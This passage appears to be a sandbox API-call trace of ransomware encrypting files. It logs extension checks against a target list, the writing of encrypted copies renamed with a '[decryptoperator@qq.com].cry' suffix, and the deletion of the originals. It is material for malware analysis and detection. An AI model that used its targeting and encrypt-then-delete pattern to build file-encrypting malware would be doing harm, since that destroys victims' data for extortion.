lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x47ed, lpOverlapped=0x0) returned 1 [0045.559] WriteFile (in: hFile=0x16c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x47f0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x47f0, lpOverlapped=0x0) returned 1 [0045.560] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.560] WriteFile (in: hFile=0x16c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.560] SetEndOfFile (hFile=0x16c) returned 1 [0045.560] CloseHandle (hObject=0x16c) returned 1 [0045.560] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.560] SetEndOfFile (hFile=0x190) returned 1 [0045.561] CloseHandle (hObject=0x190) returned 1 [0045.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.561] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 1 [0045.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.562] lstrlenW (lpString=".doc") returned 4 [0045.562] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.562] lstrlenW (lpString=".docx") returned 5 [0045.562] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.562] lstrlenW (lpString=".pdf") returned 4 [0045.562] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.562] lstrlenW (lpString=".xls") returned 4 [0045.562] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.562] lstrlenW (lpString=".xlsx") returned 5 [0045.562] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.562] lstrlenW (lpString=".ppt") returned 4 [0045.562] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.562] lstrlenW (lpString=".zip") returned 4 [0045.562] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.562] lstrlenW (lpString=".rar") returned 4 [0045.562] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.562] lstrlenW (lpString=".bz2") returned 4 [0045.562] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.562] lstrlenW (lpString=".7z") returned 3 [0045.562] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.562] lstrlenW (lpString=".dbf") returned 4 [0045.562] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.562] lstrlenW (lpString=".1cd") returned 4 [0045.562] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.562] lstrlenW (lpString=".jpg") returned 4 [0045.562] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.562] lstrlenW (lpString=".doc") returned 4 [0045.562] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.562] lstrlenW (lpString=".docx") returned 5 [0045.562] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.563] lstrlenW (lpString=".pdf") returned 4 [0045.563] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.563] lstrlenW (lpString=".xls") returned 4 [0045.563] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.563] lstrlenW (lpString=".xlsx") returned 5 [0045.563] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.563] lstrlenW (lpString=".ppt") returned 4 [0045.563] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.563] lstrlenW (lpString=".zip") returned 4 [0045.563] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.563] lstrlenW (lpString=".rar") returned 4 [0045.563] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.563] lstrlenW (lpString=".bz2") returned 4 [0045.563] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.563] lstrlenW (lpString=".7z") returned 3 [0045.563] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.563] lstrlenW (lpString=".dbf") returned 4 [0045.563] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.563] lstrlenW (lpString=".1cd") returned 4 [0045.563] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0045.563] lstrlenW (lpString=".jpg") returned 4 [0045.563] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.563] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.563] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.564] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1659) returned 1 [0045.564] CloseHandle (hObject=0x190) returned 1 [0045.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 0x20 [0045.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.564] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.564] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0045.575] GetLastError () returned 0x0 [0045.575] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x67b, lpOverlapped=0x0) returned 1 [0045.596] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x680, lpOverlapped=0x0) returned 1 [0045.597] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.597] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.597] SetEndOfFile (hFile=0x1ac) returned 1 [0045.597] CloseHandle (hObject=0x1ac) returned 1 [0045.598] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.598] SetEndOfFile (hFile=0x190) returned 1 [0045.599] CloseHandle (hObject=0x190) returned 1 [0045.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.599] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 1 [0045.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.599] lstrlenW (lpString=".doc") returned 4 [0045.599] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.599] lstrlenW (lpString=".docx") returned 5 [0045.599] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.599] lstrlenW (lpString=".pdf") returned 4 [0045.599] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.599] lstrlenW (lpString=".xls") returned 4 [0045.599] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.599] lstrlenW (lpString=".xlsx") returned 5 [0045.599] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.599] lstrlenW (lpString=".ppt") returned 4 [0045.599] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.600] lstrlenW (lpString=".zip") returned 4 [0045.600] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.600] lstrlenW (lpString=".rar") returned 4 [0045.600] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.600] lstrlenW (lpString=".bz2") returned 4 [0045.600] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.600] lstrlenW (lpString=".7z") returned 3 [0045.600] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.600] lstrlenW (lpString=".dbf") returned 4 [0045.600] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.600] lstrlenW (lpString=".1cd") returned 4 [0045.600] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.600] lstrlenW (lpString=".jpg") returned 4 [0045.600] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.600] lstrlenW (lpString=".doc") returned 4 [0045.600] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.600] lstrlenW (lpString=".docx") returned 5 [0045.600] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.600] lstrlenW (lpString=".pdf") returned 4 [0045.600] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.600] lstrlenW (lpString=".xls") returned 4 [0045.600] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.600] lstrlenW (lpString=".xlsx") returned 5 [0045.600] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.600] lstrlenW (lpString=".ppt") returned 4 [0045.600] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.600] lstrlenW (lpString=".zip") returned 4 [0045.600] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.600] lstrlenW (lpString=".rar") returned 4 [0045.600] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.600] lstrlenW (lpString=".bz2") returned 4 [0045.601] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.601] lstrlenW (lpString=".7z") returned 3 [0045.601] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.601] lstrlenW (lpString=".dbf") returned 4 [0045.601] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.601] lstrlenW (lpString=".1cd") returned 4 [0045.601] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0045.601] lstrlenW (lpString=".jpg") returned 4 [0045.601] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.601] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.601] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.601] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1379) returned 1 [0045.602] CloseHandle (hObject=0x190) returned 1 [0045.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 0x20 [0045.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.602] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.602] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.602] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.602] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0045.604] GetLastError () returned 0x0 [0045.604] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x563, lpOverlapped=0x0) returned 1 [0045.615] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x570, lpOverlapped=0x0) returned 1 [0045.616] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.616] WriteFile (in: hFile=0x1ac, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.616] SetEndOfFile (hFile=0x1ac) returned 1 [0045.616] CloseHandle (hObject=0x1ac) returned 1 [0045.616] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.616] SetEndOfFile (hFile=0x190) returned 1 [0045.617] CloseHandle (hObject=0x190) returned 1 [0045.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.617] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 1 [0045.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.618] lstrlenW (lpString=".doc") returned 4 [0045.618] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.618] lstrlenW (lpString=".docx") returned 5 [0045.618] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.618] lstrlenW (lpString=".pdf") returned 4 [0045.618] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.618] lstrlenW (lpString=".xls") returned 4 [0045.618] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.618] lstrlenW (lpString=".xlsx") returned 5 [0045.618] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.618] lstrlenW (lpString=".ppt") returned 4 [0045.618] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.618] lstrlenW (lpString=".zip") returned 4 [0045.618] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.618] lstrlenW (lpString=".rar") returned 4 [0045.618] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.618] lstrlenW (lpString=".bz2") returned 4 [0045.618] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.618] lstrlenW (lpString=".7z") returned 3 [0045.618] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.618] lstrlenW (lpString=".dbf") returned 4 [0045.618] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.618] lstrlenW (lpString=".1cd") returned 4 [0045.618] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.618] lstrlenW (lpString=".jpg") returned 4 [0045.618] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.619] lstrlenW (lpString=".doc") returned 4 [0045.619] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.619] lstrlenW (lpString=".docx") returned 5 [0045.619] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.619] lstrlenW (lpString=".pdf") returned 4 [0045.619] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.619] lstrlenW (lpString=".xls") returned 4 [0045.619] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.619] lstrlenW (lpString=".xlsx") returned 5 [0045.619] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.619] lstrlenW (lpString=".ppt") returned 4 [0045.619] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.619] lstrlenW (lpString=".zip") returned 4 [0045.619] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.619] lstrlenW (lpString=".rar") returned 4 [0045.619] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.619] lstrlenW (lpString=".bz2") returned 4 [0045.619] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.619] lstrlenW (lpString=".7z") returned 3 [0045.619] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.619] lstrlenW (lpString=".dbf") returned 4 [0045.619] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.619] lstrlenW (lpString=".1cd") returned 4 [0045.619] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0045.619] lstrlenW (lpString=".jpg") returned 4 [0045.619] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.619] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.619] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.620] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1364) returned 1 [0045.620] CloseHandle (hObject=0x190) returned 1 [0045.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 0x20 [0045.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.620] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.620] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0045.622] GetLastError () returned 0x0 [0045.622] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x554, lpOverlapped=0x0) returned 1 [0045.623] WriteFile (in: hFile=0x1ac, 